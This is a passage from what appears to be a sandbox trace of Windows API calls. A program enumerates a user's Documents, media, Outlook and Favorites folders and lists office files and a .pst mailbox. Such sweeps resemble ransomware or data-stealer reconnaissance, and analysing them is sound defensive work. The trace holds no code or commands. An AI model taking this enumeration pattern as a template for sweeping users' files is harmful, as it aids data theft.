(pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0201.063] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.063] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.063] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.063] PathFindFileNameW (pszPath="") returned="" [0201.063] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x463890b0, ftCreationTime.dwHighDateTime=0x1d5e362, ftLastAccessTime.dwLowDateTime=0x59086520, ftLastAccessTime.dwHighDateTime=0x1d5d8aa, ftLastWriteTime.dwLowDateTime=0x59086520, ftLastWriteTime.dwHighDateTime=0x1d5d8aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321628 | out: hHeap=0x2c0000) returned 1 [0201.066] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x463890b0, ftCreationTime.dwHighDateTime=0x1d5e362, ftLastAccessTime.dwLowDateTime=0x59086520, ftLastAccessTime.dwHighDateTime=0x1d5d8aa, ftLastWriteTime.dwLowDateTime=0x59086520, ftLastWriteTime.dwHighDateTime=0x1d5d8aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.066] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d79240, ftCreationTime.dwHighDateTime=0x1d5e71f, ftLastAccessTime.dwLowDateTime=0xb1a0ca90, ftLastAccessTime.dwHighDateTime=0x1d5db27, ftLastWriteTime.dwLowDateTime=0xb1a0ca90, ftLastWriteTime.dwHighDateTime=0x1d5db27, nFileSizeHigh=0x0, nFileSizeLow=0xf552, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1Cuz9kmz.rtf", cAlternateFileName="")) returned 1 [0201.066] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9795f40, ftCreationTime.dwHighDateTime=0x1d5e1e6, ftLastAccessTime.dwLowDateTime=0x31ee9aa0, ftLastAccessTime.dwHighDateTime=0x1d5e65f, ftLastWriteTime.dwLowDateTime=0x31ee9aa0, ftLastWriteTime.dwHighDateTime=0x1d5e65f, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6CwJR4agNRfXCpY.ppt", cAlternateFileName="6CWJR4~1.PPT")) returned 1 [0201.066] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed5e5a70, ftCreationTime.dwHighDateTime=0x1d5db09, ftLastAccessTime.dwLowDateTime=0x19eb3cc0, ftLastAccessTime.dwHighDateTime=0x1d5da0b, ftLastWriteTime.dwLowDateTime=0x19eb3cc0, ftLastWriteTime.dwHighDateTime=0x1d5da0b, nFileSizeHigh=0x0, nFileSizeLow=0x1650c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BlHpbVqh74ps7nRmbd.pptx", cAlternateFileName="BLHPBV~1.PPT")) returned 1 [0201.066] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd39b2240, ftCreationTime.dwHighDateTime=0x1d5d978, ftLastAccessTime.dwLowDateTime=0xc572fc40, ftLastAccessTime.dwHighDateTime=0x1d5e0b4, ftLastWriteTime.dwLowDateTime=0xc572fc40, ftLastWriteTime.dwHighDateTime=0x1d5e0b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F RRWNCvdbx", cAlternateFileName="FRRWNC~1")) returned 1 [0201.066] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf24d6280, ftCreationTime.dwHighDateTime=0x1d5dd69, ftLastAccessTime.dwLowDateTime=0x518cfaa0, ftLastAccessTime.dwHighDateTime=0x1d5dc91, ftLastWriteTime.dwLowDateTime=0x518cfaa0, ftLastWriteTime.dwHighDateTime=0x1d5dc91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iZ56A9bRq3KDvJgS8nb", cAlternateFileName="IZ56A9~1")) returned 1 [0201.066] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc960b10, ftCreationTime.dwHighDateTime=0x1d5d9dc, ftLastAccessTime.dwLowDateTime=0xdd54d900, ftLastAccessTime.dwHighDateTime=0x1d5e4b0, ftLastWriteTime.dwLowDateTime=0xdd54d900, ftLastWriteTime.dwHighDateTime=0x1d5e4b0, nFileSizeHigh=0x0, nFileSizeLow=0x8e25, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x3NdKot6 fqk.odp", cAlternateFileName="X3NDKO~1.ODP")) returned 1 [0201.066] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5d033b0, ftCreationTime.dwHighDateTime=0x1d5e4fc, ftLastAccessTime.dwLowDateTime=0x430f5ea0, ftLastAccessTime.dwHighDateTime=0x1d5da2a, ftLastWriteTime.dwLowDateTime=0x430f5ea0, ftLastWriteTime.dwHighDateTime=0x1d5da2a, nFileSizeHigh=0x0, nFileSizeLow=0x821f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YnWruvpsOj2zx9x8a.csv", cAlternateFileName="YNWRUV~1.CSV")) returned 1 [0201.066] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca071080, ftCreationTime.dwHighDateTime=0x1d5ddd9, ftLastAccessTime.dwLowDateTime=0x1df3ded0, ftLastAccessTime.dwHighDateTime=0x1d5e181, ftLastWriteTime.dwLowDateTime=0x1df3ded0, ftLastWriteTime.dwHighDateTime=0x1d5e181, nFileSizeHigh=0x0, nFileSizeLow=0x108b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kde0C7n4syUZ.ots", cAlternateFileName="_KDE0C~1.OTS")) returned 1 [0201.066] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca071080, ftCreationTime.dwHighDateTime=0x1d5ddd9, ftLastAccessTime.dwLowDateTime=0x1df3ded0, ftLastAccessTime.dwHighDateTime=0x1d5e181, ftLastWriteTime.dwLowDateTime=0x1df3ded0, ftLastWriteTime.dwHighDateTime=0x1d5e181, nFileSizeHigh=0x0, nFileSizeLow=0x108b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kde0C7n4syUZ.ots", cAlternateFileName="_KDE0C~1.OTS")) returned 0 [0201.066] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0201.067] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.067] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0201.067] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0201.067] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.067] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.067] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.068] PathFindFileNameW (pszPath="") returned="" [0201.068] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca071080, ftCreationTime.dwHighDateTime=0x1d5ddd9, ftLastAccessTime.dwLowDateTime=0x1df3ded0, ftLastAccessTime.dwHighDateTime=0x1d5e181, ftLastWriteTime.dwLowDateTime=0x1df3ded0, ftLastWriteTime.dwHighDateTime=0x1d5e181, nFileSizeHigh=0x0, nFileSizeLow=0x108b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kde0C7n4syUZ.ots", cAlternateFileName="_KDE0C~1.OTS")) returned 0xffffffff [0201.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66690 | out: hHeap=0x2c0000) returned 1 [0201.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66168 | out: hHeap=0x2c0000) returned 1 [0201.068] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.068] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0201.068] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0201.068] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.068] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.068] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.068] PathFindFileNameW (pszPath="") returned="" [0201.068] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca071080, ftCreationTime.dwHighDateTime=0x1d5ddd9, ftLastAccessTime.dwLowDateTime=0x1df3ded0, ftLastAccessTime.dwHighDateTime=0x1d5e181, ftLastWriteTime.dwLowDateTime=0x1df3ded0, ftLastWriteTime.dwHighDateTime=0x1d5e181, nFileSizeHigh=0x0, nFileSizeLow=0x108b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kde0C7n4syUZ.ots", cAlternateFileName="_KDE0C~1.OTS")) returned 0xffffffff [0201.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66690 | out: hHeap=0x2c0000) returned 1 [0201.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66168 | out: hHeap=0x2c0000) returned 1 [0201.069] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.069] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0201.069] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0201.069] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.069] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.069] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.069] PathFindFileNameW (pszPath="") returned="" [0201.069] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66690 | out: hHeap=0x2c0000) returned 1 [0201.070] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.070] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0201.070] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0201.070] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0201.070] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0201.070] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66168 | out: hHeap=0x2c0000) returned 1 [0201.071] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.071] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0201.071] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0201.071] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.071] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.071] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.071] PathFindFileNameW (pszPath="") returned="" [0201.071] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0201.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66690 | out: hHeap=0x2c0000) returned 1 [0201.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66168 | out: hHeap=0x2c0000) returned 1 [0201.071] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.071] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0201.071] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0201.071] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.071] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.072] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.072] PathFindFileNameW (pszPath="") returned="" [0201.072] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66690 | out: hHeap=0x2c0000) returned 1 [0201.072] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.073] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0201.073] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0201.073] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66168 | out: hHeap=0x2c0000) returned 1 [0201.073] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.073] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0201.073] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0201.073] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.073] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.073] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.073] PathFindFileNameW (pszPath="") returned="" [0201.073] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3845e8 | out: hHeap=0x2c0000) returned 1 [0201.074] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.074] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0201.074] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0201.074] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0201.074] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0201.074] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.074] PeekMessageW (in: 